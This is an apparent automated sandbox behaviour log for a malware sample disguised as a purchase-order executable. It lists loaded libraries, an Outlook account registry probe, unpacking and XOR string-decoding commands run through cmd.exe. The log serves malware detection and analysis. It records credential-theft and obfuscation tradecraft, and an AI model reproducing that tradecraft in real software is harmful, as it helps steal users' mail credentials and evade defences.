              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: pstorec.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: vaultcli.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: pstorec.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile written: C:\Windows\Resources\0409\gashanens.iniJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.cfg
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeUnpacked PE file: 137.2.PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeUnpacked PE file: 138.2.PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeUnpacked PE file: 139.2.PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: 00000005.00000002.56135197649.0000000008643000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.56133826946.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.56133826946.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe PID: 2980, type: MEMORYSTR
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
